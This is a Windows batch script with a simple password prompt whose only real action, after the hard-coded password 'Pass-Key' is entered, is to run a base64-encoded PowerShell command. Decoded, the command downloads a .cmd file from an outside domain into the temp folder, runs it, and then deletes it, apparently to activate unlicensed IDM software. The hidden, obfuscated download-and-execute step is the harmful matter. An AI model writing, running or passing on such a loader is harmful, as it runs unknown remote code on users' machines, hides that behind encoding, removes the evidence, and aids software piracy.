@echo off
color 0a
title Pass-Key
setlocal enabledelayedexpansion

set "password=Pass-Key"

:inputPassword
cls
set "enteredPassword="

for /f %%A in ('powershell -command "$password = Read-Host -Prompt 'Password' -AsSecureString; $password | ForEach-Object {[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($_))}"') do (
    set "char=%%A"
    if "!char!"=="*" (
        echo.
        goto :checkPassword
    )
    set "enteredPassword=!enteredPassword!!char!"
)

:checkPassword
if "!enteredPassword!"=="%password%" (
    powershell.exe -enc IwAgAEUAbgBhAGIAbABlACAAVABMAFMAdgAxAC4AMgAgAGYAbwByACAAYwBvAG0AcABhAHQAaQBiAGkAbABpAHQAeQAgAHcAaQB0AGgAIABvAGwAZABlAHIAIABjAGwAaQBlAG4AdABzAAoAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAC0AYgBvAHIAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoACgAkAEQAbwB3AG4AbABvAGEAZABVAFIATAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBtAHIAaAB4AC4AcABjAHIAZQB2AGkAZQB3AHMALgB0AGUAYwBoAC8ASQBEAE0ALgBjAG0AZAAnAAoACgAkAEYAaQBsAGUAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwASQBBAFMALgBjAG0AZAAiAAoACgB0AHIAeQAgAHsACgAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAEQAbwB3AG4AbABvAGEAZABVAFIATAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAEYAaQBsAGUAUABhAHQAaAAKAH0AIABjAGEAdABjAGgAIAB7AAoAIAAgACAAIABXAHIAaQB0AGUALQBFAHIAcgBvAHIAIAAkAF8ACgAJAFIAZQB0AHUAcgBuAAoAfQAKAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQARgBpAGwAZQBQAGEAdABoACkAIAB7AAoAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABGAGkAbABlAFAAYQB0AGgAIAAtAFcAYQBpAHQACgAgACAAIAAgACQAaQB0AGUAbQAgAD0AIABHAGUAdAAtAEkAdABlAG0AIAAtAEwAaQB0AGUAcgBhAGwAUABhAHQAaAAgACQARgBpAGwAZQBQAGEAdABoAAoAIAAgACAAIAAkAGkAdABlAG0ALgBEAGUAbABlAHQAZQAoACkACgB9AA==
) else (
    echo Password is incorrect. Try again.
    pause
    goto :inputPassword
)

endlocal
